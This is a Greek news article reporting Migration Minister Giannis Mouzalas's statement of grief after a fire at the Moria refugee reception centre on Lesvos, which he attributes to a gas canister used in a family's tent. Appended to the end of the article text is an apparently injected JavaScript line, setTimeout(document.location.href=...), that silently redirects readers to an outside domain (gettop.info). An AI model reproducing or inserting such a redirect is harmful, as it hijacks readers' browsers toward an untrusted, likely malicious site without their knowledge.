Τη βαθιά του θλίψη για το δυστύχημα στη Μόρια εκφράζει ο Μουζάλας

0
9

 

Τη βαθιά θλίψη του για το τραγικό δυστύχημα στο κέντρο υποδοχής και ταυτοποίησης στη Μόρια της Λέσβου εκφράζει, με ανακοίνωσή του, ο υπουργός Μεταναστευτικής Πολιτικής, Γιάννης Μουζάλας.

Όπως επισημαίνει ο κ. Μουζάλας, σύμφωνα με τις έρευνες της αστυνομίας και της πυροσβεστικής, «πρόκειται για ατυχές περιστατικό, καθώς η πυρκαγιά ξεκίνησε ύστερα από χρήση φιαλιδίου εντός σκηνής που διέμενε οικογένεια προσφύγων». Ο ίδιος διευκρινίζει ότι «από την πρώτη στιγμή που εκδηλώθηκε η πυρκαγιά, όλοι οι ασυνόδευτοι ανήλικοι μεταφέρθηκαν σε ξενώνες φιλοξενίας εκτός δομής, ενώ αεροπλάνο τύπου C-130 μετέβη στη Λέσβο για μεταφορά των τραυματιών στην Αθήνα και συγκεκριμένα στο νοσοκομείο ΚΑΤ».

Ο κ. Μουζάλας εκφράζει την ευχή «η υγεία των τραυματιών να αποκατασταθεί το συντομότερο δυνατό και στη συνέχεια, με τη συμβολή θεσμικών φορέων και κατοίκων να βελτιώσουμε τις συνθήκες στα νησιά μας, τόσο για τους ντόπιους πολίτες, όσο και για τους πρόσφυγες και μετανάστες». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here